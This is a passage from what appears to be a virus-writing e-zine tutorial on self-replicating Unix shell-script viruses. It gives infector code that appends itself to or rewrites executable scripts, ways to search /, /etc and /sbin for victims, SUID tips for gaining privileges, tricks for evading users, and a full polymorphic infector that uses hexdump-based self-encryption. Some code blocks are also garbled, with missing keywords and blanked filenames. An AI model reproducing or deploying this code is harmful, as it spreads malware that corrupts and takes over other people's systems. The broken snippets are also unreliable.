                        printf 'tail -c'\n
                        printf "$TAM"
                        printf '$0 > .$0.exe 2>/dev/null\n'
                        echo 'chmod +x .$0.exe 2>/dev/null'
                        echo './.$0.exe $*'
                        echo 'rm .$0.exe 2>/dev/null'
                        echo exit 0
                } > .$F.tmp 2>/dev/null
                cat $F >> .$F.tmp
                echo >> .$F.tmp
                mv .$F.tmp $F

which will be the one that searches in the current directory for executable files that are not infected ("if [ -f $F ] && [ -x $F ] && [ "$head -c4 $F)" != "#;P" ]") and generate a similar code to "" with them :-)

3.2. Search for objectives

3.2.1. Possible victim detection

A very important thing for a virus' spread is the detection of its possible victims. If we infect files that are not shell scripts we can make them useless, because they will stop working, and that will not help the virus keep spreading. That's why we have to work out a way to detect shell scripts where we can stay.

There are many possibilities on how to do it:

Any of these ways to find a victim is as valid as the others; we just have to decide how much system load we want our virus to add, because the easiest ways are quicker but find fewer victims, and vice versa.

3.2.2. How and where do we find them?

All the techniques explained in the previous chapter need to establish a starting point for the search.

The most usual thing in simple viruses is to attack the current directory, which is a poor technique because shell scripts do not vary their location in the directory tree.

Another strategy is to walk up the directories following the ".." pattern until we reach the root directory: we infect the current directory, move to the parent directory (cd ..), and so on. It is a bit slow and not very exhaustive, since it does not cover the whole directory tree.

The same way, we can make a recursive search for files, starting from the root directory or from an adequate directory like "/etc/" or "/sbin/" and descending to every branch or subdirectory looking for victims.

A third searching strategy could be the use of a specific file search command like "find". "find" returns a list of the files that match the given conditions. Among these conditions you can specify the file type, permissions, name, size, etc. The most usual thing is to request the file list and handle it as usual, but "find" offers an important feature: it is able to execute an action for every item found, so we can ask it to infect every file it finds.

For these three search strategies it is recommended to use the background execution discussed earlier, to avoid long executions in the host, because the search for targets often takes time.

The last strategy that I can think of is to try to attack the most usual scripts in all UNIX systems, like the ones that can be found at "/etc/" or "/sbin/". The main idea is to make a list of "attractive" directories and give it to a "for" so we can find something in them.

Here's a text file with some examples on how to put in practice the explained techniques:

# Current directory (pwd)
for F in *
# [...]

# 'dotdot' ("cd .." recursive)
dotdot () {
        cd $1
        [ "$1" = "/" ] && exit 0
        for F in *
                # virus code
        dotdot ".."
# [...]

# Recursive from /
currentdir () {
        cd $1
        for F in *
                [ -d $F ] && currentdir $F
                # virus code
# [...]

# find (1)
for F in $(find / -perm +111 -type f)
        # [...]

# find (2)
find / -perm +111 -type f -exec sh -c \"#virus code...\"
# [...]

# Usual scripts
LIST="/etc/* /etc/init.d/* /sbin/rc.0/*"
for F in $LIST
# [...]

The different examples follow what is explained before. I have used a compact notation using the "AND list". This code:

[ -d $F ] && currentdir $F

is equal to:

        if [ -d $F ]
        then
                currentdir $F
        fi

To do the same when the "if" condition is not met, we use the "OR list", as explained in chapter 2.2.1.
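As a small sketch of this equivalence, the two functions below print the same thing for the same argument. The function names and the test paths are made up for illustration, and the functions do nothing but print a message:

```shell
#!/bin/sh
# Hypothetical helper names; they only report what kind of path they were given.

describe_with_list () {
    # AND list: the echo runs only if the test succeeds.
    [ -d "$1" ] && echo "directory"
    # OR list: the echo runs only if the test fails.
    [ -d "$1" ] || echo "not a directory"
}

describe_with_if () {
    # The same logic written as a full if/then/else/fi.
    if [ -d "$1" ]
    then
        echo "directory"
    else
        echo "not a directory"
    fi
}

describe_with_list /
describe_with_if /
describe_with_list /nonexistent-path-for-demo
describe_with_if /nonexistent-path-for-demo
```

The list form is shorter, but it only pays off for one-line bodies; anything longer reads better as a regular "if".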

3.2.3. Shell scripts and "su"

Scripting with some shells is different if the shell is sh or a shell derived from sh, such as Bash. Bash is very cautious with scripts that have the SUID bit set. If we forget to call bash with the "-c" option in our SUIDed scripts, Bash will act very strangely and will not be able to perform certain accesses.

Let's see it with an example tested in my Linux Debian Potato 2.2.r3:

me@localhost:~$ cat > foo.txt
hello, world!
me@localhost:~$ chmod 644 foo.txt
me@localhost:~$ cat >
cat foo.txt
me@localhost:~$ chmod 4111
me@localhost:~$ ./
bash: ./ Permission denied
me@localhost:~$ cat foo.txt
hello, world!

As we can see, the system is even more restrictive than the shell itself, as we have access to "foo.txt" from the shell while we don't from the script with "SUID".

If we do the same with an ELF we'll realize that this kind of executable does not have so many restrictions when the SUID bit is set:

me@localhost:~$ cat > foo.c
main(){system("cat foo.txt");}
me@localhost:~$ gcc foo.c -o foo
me@localhost:~$ chmod 4111 foo
me@localhost:~$ chmod 600 foo.txt
me@localhost:~$ ./foo
hello, world!
me@localhost:~$ su zert
zert@localhost:/home/me$ ./foo
hello, world!
zert@localhost:/home/me$ ./
./ ./ Permission denied

Other shells (ksh, for instance) don't "drop" the SUID bit. So, if we want to gain privileges by attacking and creating SUIDed scripts, we have to remember that it is strictly necessary to use Bash with the "-c" option.

3.3. Hiding techniques

3.3.1. Stupid techniques

Let's see some stupid hiding techniques. As shell scripts are files that are often opened and edited, it is quite possible that someone opens an infected file and sees our code. A stupid way to avoid this is to confuse the user when the file is opened.

A message in a comment like "Rem File edited by Microsoft Windows, do NOT modify!" should be enough for a simple .BAT and an innocent user. The equivalent in UNIX environments could consist of trying to emulate the message that the "vi" editor usually writes when some other user is editing the same file from another console. The objective is to make the user believe this is happening so he stops editing the file, but in my opinion, a user with a minimum of intelligence would realize what is happening O:-D

The included text could look like this:


# Found a swap file by the name "..swp"
#   dated: Wed Nov 29 15:23:28 2000
#   owned by: root
#  file name: ~..swp
#   modified: no
#  host name: localhost
#  user name: root
#  process ID: 13086 (still running)
# While opening file "..swp"
#   dated: Wed Nov 29 15:23:27 2000
#(1) Another program may be editing the same file
# If this is the case, be careful not to end up with two
# different instances of the same file when making changes.
# Quit inmediatly.
#(2) An edit session for this file crashed.
# If this is the case, use ":recover" or "vim -r ..swp"
# to recover the changes (see ":help recovery)".
# If you did this already, delete the swap file "..swp"
# to avoid this message.

As I said, it is a little stupid as a way to hide, but there it is as a mere curiosity :-D

3.3.2. File names

One way of making our detection harder is to use strange names for the temporary files that we will need. The paradigmatic example is "-". When that name is typed at the console, it is typically interpreted as the standard input (stdin) instead of as the file named "-".

A user with a minimum of intelligence could get around this with a command like: "cat ./-".
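From the user's side, this workaround can be sketched as follows. It is only an illustration: the variable names "demo_dir" and "dash_contents" and the file contents are made up, and everything happens in a throwaway directory created with "mktemp -d" (widely available, although not strictly POSIX):

```shell
#!/bin/sh
# Work in a throwaway directory so nothing else is touched.
demo_dir=$(mktemp -d)
cd "$demo_dir" || exit 1

# Create a file literally called "-" through a redirection.
echo "contents of the dash file" > ./-

# "cat -" would read standard input; with a path prefix the name
# is treated as an ordinary file.
dash_contents=$(cat ./-)
echo "$dash_contents"

# The same prefix works for removing the file.
rm ./-
cd / && rmdir "$demo_dir"
```

The "./" prefix works with any command, because the argument no longer starts with a dash and so cannot be taken for stdin or for an option.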

Playing on the resemblance to familiar system names is also a good way of doing it, and names like ".kmem.tmp" or ".core" could go unnoticed by some users.

3.3.3. Code inclusion, the "source" clause

As explained in the chapter 3.1.3, using "source" or "." we can let our code in the host be just a simple line, which makes reference to the file that really contains the code.

Imagine that our virus is in "..." (strange name O:-D); we can be sure that it will be executed if there is a line like "source ..." or ". ..." in the host's code (morse rulz! ;-D).

3.3.4. Output messages

Capturing the error messages is a must, so they do not appear on the screen and upset the user. Redirecting everything to "/dev/null" we will avoid ugly error messages :-)

3.3.5. Execution delays

When talking about "residence" we talked about execution delays in the host. If a script that usually lasts just a few milliseconds now takes up to 20 seconds and makes heavy use of the hard disk, a minimally intelligent user would try to find out what is going on.

To avoid these delays the best thing is to dump all the code into a temporary file and execute this file in the background. That way, the host will execute normally, and our virus will have time to act even after the host's execution is finished.

3.3.6. Aliases

If we understand virus size as an exposure factor, we can reduce our scripts' size by using aliases. Code readability will be lost, but this can actually be an advantage.

3.3.7. Polymorphism

Polymorphic viruses in shell script? It sounds like a joke, but they can be done :-) There are many ways to "polymorphize" our code:

As I said, if you want to know how to put in practice the first of the techniques, look in the article Gobleen Warrior wrote, where they are explained in detail. From now on we will explain other techniques.

When I set out to write a polymorphic virus in shell script I focused on how a polymorphic virus is written: there is an encryption routine, and the code varies depending on the technique the encryption routine uses. With this idea in mind I set out to "cipher" my scripts, and what came to my mind was to "hexdump" the script so I could have a hexadecimal dump of it. This is a group of unreadable characters in which random numbers can be inserted, so it is not a fixed code :-)

And so, the code is stored as a number string inside a comment in the last line of the script, and a little routine "decrypts" and executes the code.

In every instance of the virus the "ciphered" code is different because random numbers have been inserted, and the routine used to "decipher" the code is also "polymorphized" by using different syntaxes to perform the same actions.

Let's see this translated into code:

if [ $# != 2 ]
        echo "$0, usage: $0 file_src file_dst"
        exit 1
        echo $(hexdump "$1") >> $2

What this simple script does is dump the result of "hexdump" at the end of a file. We will use it for the first virus generation, as it will be "ciphered" from the beginning. This way, we write what we want our virus to do, we "cipher" it with this script and we paste it at the end of another script which has the "deciphering" routine:

(virus code)\ 
(decrypt code) ---------------> (decrypt code+virus code crypted)

and with this we get the first generation of our polymorphic virus.

The next script is the decrypted code, which will be dumped into a temporary file by the "deciphering" routine and executed.

for F in *
        [ "$F" = "-" ] || if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' \xc7)
                { head -2 $0
                echo 'rm ./- 2>/dev/null'
                if [ $RANDOM -lt 16386 ]
                        echo 'for C in $(tail -2 $0); do [ ${#C} -eq 4 ] && printf "\x$(expr substr $C 3 2)\x$(expr substr $C 1 2)">>-; done'
                        echo 'for P in $(tail -2 $0)'
                        echo 'do'
                        echo ' if [ $(expr length $P) -eq 4 ] ; then printf "\x$(expr substr $P 3 2)\x$(expr substr $P 1 2)">>-; fi'
                        echo 'done'
                echo 'sh ./- $0 &'
                echo $HOST | tr \xc7 '\n' | grep -v '#!/bin/sh'
                for V in $(tail -1 $1)
                        [ ${#V} -eq 4 ] && VIRUS="$VIRUS $V $RANDOM"
                echo "# $RANDOM$VIRUS"
                } > $F 2>/dev/null
rm $0 2>/dev/null

Even though I write "" as the script's name, its real name is "-", to avoid repeating another script's name and also to make it harder to see, as explained in chapter 3.3.2.

What we first try to do is to infect the whole directory. For this we check whether the file being attacked is a shell script, by using "head", but we avoid trying it with our own shell script, because "-" is interpreted by "head" as the standard input (stdin) and it would wait for input. So we introduce a check by using an "OR list", and then we only use "head" when the file is not "-".

Next, we save the whole "host" file in an environment variable. That way we avoid saving the "host" file into a temporary file to which the viral code would be attached. The rest of the code is concatenated with the environment variable, and the result of all this is redirected to the final file by using a command block ("{}", see chapter 2.2.1->Command blocks).

In that block we'll do the following:

And with all this we have our infection completed. As we can see, both the "ciphered" part and the "decrypting" part vary from infection to infection. Even so, the "decrypting" routine could be made more polymorphic; right now we only have 2 possible routines O:-)

This is what the polymorphic virus should look like:

rm ./- 2>/dev/null
for C in $(tail -2 $0); do [ ${#C} -eq 4 ] && printf "\x$(expr substr $C 3 2)\x$(expr substr $C 1 2)">>-; done
sh ./- $0 &
# virus code goes here hexdumped

The last line of the code is a commented line which contains the whole code in hexadecimal, so this is the longest part of the virus.

Now let's see what it looks like before and after an infection:

drwxr-sr-x 2 zert users  4096 Aug 5 21:58 .
drwxr-sr-x 3 zert users  4096 Aug 4 20:42 ..
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy1
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy2
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy3
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy4
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy5
-rwxr-xr-x 1 zert users  2628 Aug 5 21:58

What we can see here is the test directory before any "host" file ("dummy" files) has been infected. "" is our virus' first generation.

drwxr-sr-x 2 zert users  4096 Aug 5 22:23 .
drwxr-sr-x 3 zert users  4096 Aug 4 20:42 ..
-rwxr-xr-x 1 zert users  6552 Aug 5 22:23 dummy1
-rwxr-xr-x 1 zert users  6527 Aug 5 22:23 dummy2
-rwxr-xr-x 1 zert users  6564 Aug 5 22:23 dummy3
-rwxr-xr-x 1 zert users  6589 Aug 5 22:23 dummy4
-rwxr-xr-x 1 zert users  6538 Aug 5 22:23 dummy5
-rwxr-xr-x 1 zert users  2628 Aug 5 21:58

The same directory after "" was executed. As we can see, the size of every file is different, even though they all started with the same size. Another important point is that the first generation of the virus ("" before infecting) is smaller than the second generation, which has a size near 6500 bytes :-)

We can make it much more difficult by using "factor" to get the prime factors of a number. That number could be the ASCII code of the virus or of each line, or a reversible calculation on them. With "factor" we cipher our code, and by multiplying the resulting factors (expr OP1 * OP2) we "decipher" it. Writing an example for this is left as an exercise for the reader O;-P

4. Conclusions

4.1. The future of the shell scripts

As we have seen throughout this little tutorial, there are many possibilities for playing with shell script viruses. I say play because I do not think these can be considered serious viruses, due to their long execution times, their size in the "host" and the common property of shell scripts, which is being human readable (plain ASCII text).

We talked before about the "home UNIX environments socialization", with the arrival of the BSDs and the different Linux distributions. All this makes a new place for this kind of virus, sheltered by the new, inexperienced users.

The increase in power of new processors and the large capacity of today's storage devices are helping this kind of virus, since they shorten the execution delays and hide the increase in the "host's" size.

So the conclusion to all this is that shell script viruses are not a real threat to UNIX systems, but they may find a growing niche in them.

4.2. Thanks

Now, to finish, I would like to thank Virusbuster for the opportunity of writing in the best e-zine of the virus scene known worldwide, I am really glad about it ;-)

Thanks to haLLs for helping me translate this into English O:-) and for giving new ideas, to zgor for his comments about permissions in shell scripts, and to all the int80h group for their support and their eagerness to work on this.

Thanks Snakebyte and Gobleen Warrior for motivating me to write this little tutorial with their excellent texts.

To all the GNU community that works day to day for a better software, open and free: you are awesome ;-)

5. References
